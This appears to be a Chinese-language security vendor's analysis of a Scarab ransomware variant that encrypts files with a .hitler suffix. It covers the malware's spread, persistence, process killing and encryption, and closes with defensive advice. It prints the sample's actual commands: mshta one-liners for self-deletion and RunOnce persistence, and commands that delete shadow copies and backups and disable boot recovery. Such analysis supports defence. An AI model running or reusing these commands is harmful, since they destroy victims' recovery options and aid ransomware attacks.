Scarab勒索病毒最新變種,希特勒“冠名”
一、事件背景
深信服EDR安全團隊跟蹤了Scarab勒索病毒的最新變種,該變種檔案加密字尾為.hitler,有趣的是,希特勒對應的英文就是hitler,算是莫名躺槍了。
通常,Scarab勒索病毒是利用Necurs殭屍網路進行傳播的,Necurs是世界上最大的殭屍網路之一,曾用於傳播多個惡意家族樣本。最近一段時間,發現Scarab勒索病毒還會通過RDP爆破+人工、捆綁軟體的方式進行傳播。
下圖,是此變種的勒索資訊。
二、功能流程
此Scarab變種,其功能流程大致如下,依次分別為偽裝錄屏、螢幕快照、記憶體解密、設定啟動、自刪除、刪除卷影、殺程序、遍歷加密、勒索彈窗。
偽裝錄屏,是為了騙過安全軟體,讓其誤以為是一個正常的錄屏軟體。此外,還截圖了螢幕快照。與多數病毒一樣,此勒索變種同樣會設定啟動,做持久化操作,也會做自刪除的動作。為了保證資料不可恢復,同時也做了刪除卷影的操作。
此外,此勒索病毒會殺掉多數的系統程序、應用程序、殺掉程序,最後遍歷資料夾,做加密。所有的檔案加密成功後,彈出勒索資訊。
三、詳細分析
1.查殼,母體樣本使用的是UPX加殼,如下所示:
2.樣本使用了詳細的檔案描述資訊,如下所示:
3.脫殼分析,動態除錯,如下所示:
4.錄製音訊,如下所示:
相應的反彙編程式碼,如下所示:
5.建立視窗,如下所示:
6.獲取作業系統語言版本,如下所示:
7.設定HOOK,如下所示:
8.抓屏操作,如下所示:
9.啟動子程序,如下所示:
10.進行持久化操作,拷貝自身到%appdata%目錄下,如下所示:
拷貝之後,如下所示:
然後啟動%appdata%目錄下的sevnz.exe程式,如下所示:
11.解密記憶體相應的字串,如下所示:
通過執行mshta.exe,刪除自身,如下所示:
相應的命令列,如下:
mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('Scarab.exe');close()}catch(e){}},10);"
12.呼叫mshta.exe程式,設定自啟動項,如下所示:
相應的命令列,如下:
mshta.exe "javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('sevnz.exe').Path;o.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\iyryCNqPEUF',i);}catch(e){}},10);"
設定完成之後,如下所示:
13.通過mshta.exe設定相應的登錄檔項,如下所示:
將相應的刪除系統備份,磁碟卷影操作的命令列,設定為登錄檔項,如下所示:
通過mshta.exe執行命令,如下所示:
相應的命令列,如下:
o=new ActiveXObject("WScript.Shell");o.Run("cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0",0);o.Run("cmd.exe /c wmic SHADOWCOPY DELETE",0);o.Run("cmd.exe /c vssadmin Delete Shadows /All /Quiet",0);o.Run("cmd.ex e /c bcdedit /set {default} recoveryenabled No",0);o.Run("cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures",0);
14.遍歷程序,如下所示:
發現相關的程序,則結束程序,如下所示:
相關程序列表如下:
ccleaner.exe;ccleaner64.exe;tasklist.exe;taskmgr.exe;regedit.exe;anvir.exe;anvir64.exe;cscript.exe;wscript.exe;powershell.exe;procexp.exe;far.exe;agntsvc.exe;agntsvc.exeagntsvc.exe;agntsvc.exeencsvc.exe;agntsvc.exeisqlplussvc.exe;dbeng50.exe;dbsnmp.exe;excel.exe;firefoxconfig.exe;infopath.exe;isqlplussvc.exe;msaccess.exe;msftesql.exe;mspub.exe;mydesktopqos.exe;mydesktopservice.exe;mysqld.exe;mysqld-nt.exe;mysqld-opt.exe;ncsvc.exe;ocautoupds.exe;ocomm.exe;ocssd.exe;onenote.exe;oracle.exe;outlook.exe;powerpnt.exe;sqbcoreservice.exe;sqlagent.exe;sqlbrowser.exe;sqlserver.exe;sqlservr.exe;sqlwriter.exe;steam.exe;synctime.exe;tbirdconfig.exe;thebat.exe;thebat64.exe;thunderbird.exe;visio.exe;winword.exe;wordpad.exe;xfssvccon.exe;
15.記憶體解密出相應的加密字串,然後設定為登錄檔項,如下所示:
16.在記憶體中解密生成相應的勒索資訊,使用者的加密ID,如下所示:
17.遍歷檔案,記憶體中加密相應的檔案,檔名隨機生成,檔案字尾為hitler如下所示:
18.然後替換到原始的檔案,如下所示:
19.然後設定加密後的檔案屬性,如下所示:
20.遍歷檔案的時候,會判斷是否為加密檔案列表中的字尾,相應的字尾列表有二百多種,如下所示:
部分字尾名列表,如下所示:
21.同時會遍歷相應的檔案目錄,排除以下檔案目錄,相應的檔案目錄列表如下:
\$RECYCLE.BIN\; \All Users\; \AppData\; \ApplicationData\; \System Volume Information\; \Windows\; \intel\; \nvidia\; \Trend Micro\;
22.在加密檔案的目錄下,生成對應的勒索資訊文字檔案,然後將之前記憶體生成的勒索資訊,寫入到檔案,如下所示:
23.勒索資訊文字檔案HOW TO RECOVER ENCRYPTED FILES.TXT,最後通過執行notepad.exe程式,彈出相應的勒索資訊,執行的命令列如下:notepad.exe "C:\Users\panda\HOW TO RECOVER ENCRYPTED FILES.TXT"
四、解決方案
深信服提醒廣大使用者做好病毒檢測與防禦措施,防護勒索病毒攻擊。
1、及時給電腦打補丁,修復漏洞。
2、對重要的資料檔案定期進行非本地備份。
3、不要點選來源不明的郵件附件,不從不明網站下載軟體。
4、儘量關閉不必要的檔案共享許可權。
5、更改帳號密碼,設定強密碼,避免使用統一的密碼,因為統一的密碼會導致一臺被攻破,多臺遭殃。
6、Scarab勒索病毒最新變種會利用RDP(遠端桌面協議),如果業務上無需使用RDP的,建議關閉RDP。當出現此類事件時,推薦使用深信服防火牆,或者終端檢測響應平臺(EDR)的微隔離功能對3389等埠進行封堵,防止擴散!
7、深信服防火牆、終端檢測響應平臺(EDR)均有防爆破功能,防火牆開啟此功能並啟用11080051、11080027、11080016規則,EDR開啟防爆破功能進行防禦。
8、深信服安全感知平臺(SIP)可對企業內網進行全網的安全態勢感知,支援接入EDR、防火牆等眾多安全產品,對安全可視,可協助使用者提前預警安全威脅。
五、IOC/">IOC
MD5
374F8ACCC92838939A6D3960AAB36AA0